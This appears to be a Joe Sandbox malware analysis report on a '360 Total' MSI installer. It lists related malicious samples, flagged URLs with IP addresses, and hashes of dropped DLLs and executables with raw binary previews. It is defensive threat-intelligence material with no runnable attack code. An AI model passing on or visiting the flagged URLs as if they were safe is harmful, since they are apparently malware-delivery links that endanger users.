                                          https://u18727881.ct.sendgrid.net/ls/click?upn=u001.C98xKppRPMcm9u3MCGfzKZoMS1OpBvTt67698T0dL36uvjeaIcwJCGWCF40JX0jTgfIq_7OnzmxzMpUZLpDhO-2FIQbFKADvzXAOcu2Z6qDokXjolLBB1Q9VRzsF9K8mIjVEFl-2BHay6WBbN5WlzpyVSr4HVkHTzvzCtmwku69-2FJZyLx3-2B4ShTXTnPqinKBtOGbSRbSYGRG3Lt22AUmt-2BZ99sH-2B6Jqf0nt-2BFsnaCp0VSm16eoPdzoH74Sn7jINM2DWCxglARpPWuPOE3iiXY03LGL6ko4g-3D-3DGet hashmaliciousUnknownBrowse
                                          • 1.1.1.1
                                          http://asana.wfGet hashmaliciousUnknownBrowse
                                          • 172.67.74.152
                                          https://url.us.m.mimecastprotect.com/s/qkT5Cv2pWyUOjZODty9fnF?domain=google.comGet hashmaliciousUnknownBrowse
                                          • 104.22.75.216
                                          23-April-24-ACH-29be82ea.jarGet hashmaliciousUnknownBrowse
                                          • 172.67.168.231
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.32374.20351.xlsxGet hashmaliciousUnknownBrowse
                                          • 104.21.46.75
                                          SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 104.21.46.75
                                          ProconGO1121082800.LnK.lnkGet hashmaliciousUnknownBrowse
                                          • 104.21.46.75
                                          file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                          • 104.21.46.75
                                          Version.125.7599.75.jsGet hashmaliciousSocGholishBrowse
                                          • 104.21.46.75
                                          Database4.exeGet hashmaliciousUnknownBrowse
                                          • 104.21.46.75
                                          lzShU2RYJa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                          • 104.21.46.75
                                          XV9q6mY4DI.exeGet hashmaliciousBabuk, DjvuBrowse
                                          • 104.21.46.75
                                          n8XBpFdVFU.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                          • 104.21.46.75
                                          R5391762lf.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                          • 104.21.46.75
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Users\user\AppData\Local\Temp\MSIB1DF.tmpavp.msiGet hashmaliciousUnknownBrowse
                                            Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                              Cheat Lab 2.7.2.msiGet hashmaliciousUnknownBrowse
                                                payload.jsGet hashmaliciousUnknownBrowse
                                                  payload.jsGet hashmaliciousUnknownBrowse
                                                    Doc_m42_81h118103-88o62135w8623-1999q9.jsGet hashmaliciousUnknownBrowse
                                                      avp.msiGet hashmaliciousUnknownBrowse
                                                        sharepoint.msiGet hashmaliciousUnknownBrowse
                                                          slack.msiGet hashmaliciousBazar LoaderBrowse
                                                            out_bdrts.jsGet hashmaliciousBazar LoaderBrowse
                                                              C:\Users\user\AppData\Local\Temp\MSIB151.tmpavp.msiGet hashmaliciousUnknownBrowse
                                                                Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                                                  Cheat Lab 2.7.2.msiGet hashmaliciousUnknownBrowse
                                                                    payload.jsGet hashmaliciousUnknownBrowse
                                                                      payload.jsGet hashmaliciousUnknownBrowse
                                                                        Doc_m42_81h118103-88o62135w8623-1999q9.jsGet hashmaliciousUnknownBrowse
                                                                          avp.msiGet hashmaliciousUnknownBrowse
                                                                            sharepoint.msiGet hashmaliciousUnknownBrowse
                                                                              slack.msiGet hashmaliciousBazar LoaderBrowse
                                                                                out_bdrts.jsGet hashmaliciousBazar LoaderBrowse
                                                                                  Process:C:\Windows\System32\rundll32.exe
                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):906752
                                                                                  Entropy (8bit):6.2833336520446625
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
                                                                                  MD5:74143402C40AC2E61E9F040A2D7E2D00
                                                                                  SHA1:4053DC85BB86C47C63F96681D6A62C21CD6342A3
                                                                                  SHA-256:1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
                                                                                  SHA-512:4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.*Ug.MPf.*Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):1215
                                                                                  Entropy (8bit):5.6668025219816505
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:W/gyI269VE6jIMaI3I4iItRpU/e+FPwai6aiDDhiSrokfzs6LK:0BO99jhaxt+buP1iviDD8Sr0
                                                                                  MD5:85E82CDD14F750E1D2EF84082D88E443
                                                                                  SHA1:D65B59D9968CA102A41C980C7E28011C28153F98
                                                                                  SHA-256:09CF215DEB1FCF9A10D01B7353060558B959E4998DB582E0BBE9A61927E9FCFC
                                                                                  SHA-512:FAAD67821948E69A3505DA147C25581CD9F552085F69D0CFB0042123A1594B341C9BFF85BC59B7D1F70332B092B1893EB620D9E02B9E6E83A5AF927DDC440BBB
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:...@IXOS.@.....@`..X.@.....@.....@.....@.....@.....@......&.{B135729E-0574-44D1-B7A1-6E44550F506B}..360 Total..ad.msi.@.....@.....@.....@........&.{805E70A6-23C0-4688-BBAF-6F995BB72730}.....@.....@.....@.....@.......@.....@.....@.......@......360 Total......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@......&.{ADF9F598-7B84-45C9-B1CA-E80968A538BA}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@........CreateFolders..Creating folders..Folder: [1]#.9.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..+.C:\Users\user\AppData\Local\sharepoint\....7.C:\Users\user\AppData\Local\sharepoint\360total.dll....WriteRegistryValues..Writing system reg
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):446944
                                                                                  Entropy (8bit):6.403916470886214
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: avp.msi, Detection: malicious, Browse
                                                                                  • Filename: Cheater Pro 1.6.0.msi, Detection: malicious, Browse
                                                                                  • Filename: Cheat Lab 2.7.2.msi, Detection: malicious, Browse
                                                                                  • Filename: payload.js, Detection: malicious, Browse
                                                                                  • Filename: payload.js, Detection: malicious, Browse
                                                                                  • Filename: Doc_m42_81h118103-88o62135w8623-1999q9.js, Detection: malicious, Browse
                                                                                  • Filename: avp.msi, Detection: malicious, Browse
                                                                                  • Filename: sharepoint.msi, Detection: malicious, Browse
                                                                                  • Filename: slack.msi, Detection: malicious, Browse
                                                                                  • Filename: out_bdrts.js, Detection: malicious, Browse
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):446944
                                                                                  Entropy (8bit):6.403916470886214
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: avp.msi, Detection: malicious, Browse
                                                                                  • Filename: Cheater Pro 1.6.0.msi, Detection: malicious, Browse
                                                                                  • Filename: Cheat Lab 2.7.2.msi, Detection: malicious, Browse
                                                                                  • Filename: payload.js, Detection: malicious, Browse
                                                                                  • Filename: payload.js, Detection: malicious, Browse
                                                                                  • Filename: Doc_m42_81h118103-88o62135w8623-1999q9.js, Detection: malicious, Browse
                                                                                  • Filename: avp.msi, Detection: malicious, Browse
                                                                                  • Filename: sharepoint.msi, Detection: malicious, Browse
                                                                                  • Filename: slack.msi, Detection: malicious, Browse
                                                                                  • Filename: out_bdrts.js, Detection: malicious, Browse
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):446944
                                                                                  Entropy (8bit):6.403916470886214
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):446944
                                                                                  Entropy (8bit):6.403916470886214
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):446944
                                                                                  Entropy (8bit):6.403916470886214
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):446944
                                                                                  Entropy (8bit):6.403916470886214
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):906752
                                                                                  Entropy (8bit):6.2833336520446625
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
                                                                                  MD5:74143402C40AC2E61E9F040A2D7E2D00
                                                                                  SHA1:4053DC85BB86C47C63F96681D6A62C21CD6342A3
                                                                                  SHA-256:1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
                                                                                  SHA-512:4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.*Ug.MPf.*Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................
                                                                                  Process:C:\Windows\System32\rundll32.exe
                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):906752
                                                                                  Entropy (8bit):6.2833336520446625
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
                                                                                  MD5:74143402C40AC2E61E9F040A2D7E2D00
                                                                                  SHA1:4053DC85BB86C47C63F96681D6A62C21CD6342A3
                                                                                  SHA-256:1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
                                                                                  SHA-512:4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.*Ug.MPf.*Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {805E70A6-23C0-4688-BBAF-6F995BB72730}, Number of Words: 10, Subject: 360 Total, Author: HuMaster LLC, Name of Creating Application: 360 Total, Template: ;1033, Comments: This installer database contains the logic and data required to install 360 Total., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                  Category:dropped
                                                                                  Size (bytes):1619456
                                                                                  Entropy (8bit):7.152500797895932
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:QZH3YuW8zBQSc0ZnSKmZKumZr7A2BQTBG:+Y90Zn0K/A2OF
                                                                                  MD5:666151C11B7899A0C764ABE711D3F9B3
                                                                                  SHA1:35462114E096F4D307607D713136BFE38479870D
                                                                                  SHA-256:8041A15E27C785F2ADCCE9E8C643F5CC619B52E50CD36FF043D13C4089CE1CAD
                                                                                  SHA-512:835FEE905D540F1E3B4D32A0645041C9ADD6EA488675A8CA99DBE571CFAAEF5781BED8C1277DD7942BE7D672945D68A1016C2AB5CB645D539E07893D69672ADC
                                                                                  Malicious:false
                                                                                  Preview:......................>.......................................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F...............................................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...D...........G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):446944
                                                                                  Entropy (8bit):6.403916470886214
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):446944
                                                                                  Entropy (8bit):6.403916470886214
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):401029
                                                                                  Entropy (8bit):6.5916740449760995
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:QMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1L:QMvZx0FlS68zBQSncb4ZPQTpAjZxqO1L
                                                                                  MD5:EF76849DEA088BCC0F8E02915E3CA43D
                                                                                  SHA1:95AD6715CA826A45F518364BB2156F81E0705F18
                                                                                  SHA-256:46C71ED6563A634729BF0E7BDA08A6C09E2A0CCD840C558DD460FED0FFD1F550
                                                                                  SHA-512:23A247FCE608306AB643AEB7E72DAF3E3965768DFC6D1BFC06D85DD2403FB8C5CAAEF4B4BF09C536A8D3CF508FD964E94141AEB2E91F70DE26390C94116758C1
                                                                                  Malicious:false
                                                                                  Preview:...@IXOS.@.....@`..X.@.....@.....@.....@.....@.....@......&.{B135729E-0574-44D1-B7A1-6E44550F506B}..360 Total..ad.msi.@.....@.....@.....@........&.{805E70A6-23C0-4688-BBAF-6F995BB72730}.....@.....@.....@.....@.......@.....@.....@.......@......360 Total......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}9.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}+.01:\Software\HuMaster LLC\360 Total\Version.@.......@.....@.....@......&.{ADF9F598-7B84-45C9-B1CA-E80968A538BA}7.C:\Users\user\AppData\Local\sharepoint\360total.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".9.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@....
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):399328
                                                                                  Entropy (8bit):6.589290025452677
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                                                  MD5:B9545ED17695A32FACE8C3408A6A3553
